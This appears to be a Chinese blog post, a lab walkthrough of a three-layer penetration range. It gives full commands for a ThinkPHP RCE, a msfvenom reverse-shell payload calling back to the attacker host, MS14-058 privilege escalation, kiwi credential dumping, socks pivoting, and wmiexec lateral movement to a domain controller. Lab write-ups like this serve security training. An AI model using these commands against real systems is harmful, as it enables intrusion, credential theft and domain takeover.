本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记
文章目录
前文链接
- WAMP/DVWA/sqli-labs 搭建
- burpsuite工具抓包及Intruder暴力破解的使用
- 目录扫描,请求重发,漏洞扫描等工具的使用
- 网站信息收集及nmap的下载使用
- SQL注入(1)------了解成因和手工注入方法
- SQL注入(2)------各种注入
- SQL注入(3)------SQLMAP
- SQL注入(4)------实战SQL注入拿webshell
- Vulnhub靶机渗透之Me and My Girlfriend
- XSS漏洞
- 文件上传漏洞
- 文件上传绕过
- 文件包含漏洞
- Vulnhub靶机渗透之zico2
- 命令执行漏洞
- 逻辑漏洞(越权访问和支付漏洞)
- 网站后台安全
- weevely的使用及免杀(Linux中的菜刀)
- MSF(1)------一次完整的渗透流程
- WebShell命令执行限制(解决方案)
- 记一次艰难的SQL注入(过安全狗)
- MSF(2)------各种木马的生成及简单的免杀
- MSF(3)------apk和exe的加马(过360、火绒)
- 通过Frp解决实现内网穿透
- 改造冰蝎马,实现免杀之default_aes php
- 记一次简单的对盗号网站的渗透
- 记一次幸运的漏洞挖掘
- 内网渗透初探
- 记对外国某服务器的内网渗透
- 一次丝滑的内网渗透拿下域控
- 实战内网PTH上线域控
- 通过路由器进行内网渗透
- 钓鱼邮件和钓鱼样本
- 无境vulntarget-a wp
- 无境ZeroLogon 练习 wp
- 无境三层综合渗透 wp
一层Win7
WebShell
目标IP:192.168.111.150,用nmap快速扫全端口
bash
nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.150

重点是80端口的web服务,打开发现是一个Thinkphp

使用利用工具测试,存在ThinkPHP 5.0.22/5.1.29 RCE

用工具一键getshell

Administrator权限的Win7,明显在域中

Msf
用reverse_tcp生成shellcode
bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.25 lport=6666 -f exe > 1.exe
msfconsole这样子配置
bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
把生成的1.exe放到服务器上运行,成功获取到meterpreter

提权
systeminfo看补丁信息

我靠这么多
考虑使用MS14-058进行提权
bash
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.111.25
set target 1
run
成功得到SYSTEM的meterpreter

抓密码
bash
load kiwi

bash
creds_all

666演都不演了,得到密码为dc123.com
横向
systeminfo查到当前域为sun.com

用meterpreter直接查域控
bash
run post/windows/gather/enum_domain

得到域控IP为192.168.138.138
二层域控
一级代理
用autoroute建立一级代理,走192.168.138.0/24段
bash
run post/multi/manage/autoroute

然后创建socks5代理
bash
use auxiliary/server/socks_proxy
run

用proxychain来配置代理,在/etc/proxychain4.conf最后一行加上
bash
socks5 127.0.0.1 1080
可以用nc测试代理是否建立成功
bash
proxychains nc -zv 192.168.138.138 445

能连通即为成功
wmiexec
直接用psexec横向getshell
bash
proxychains impacket-wmiexec SUN/Administrator:'dc123.com'@192.168.138.138

好简单的靶场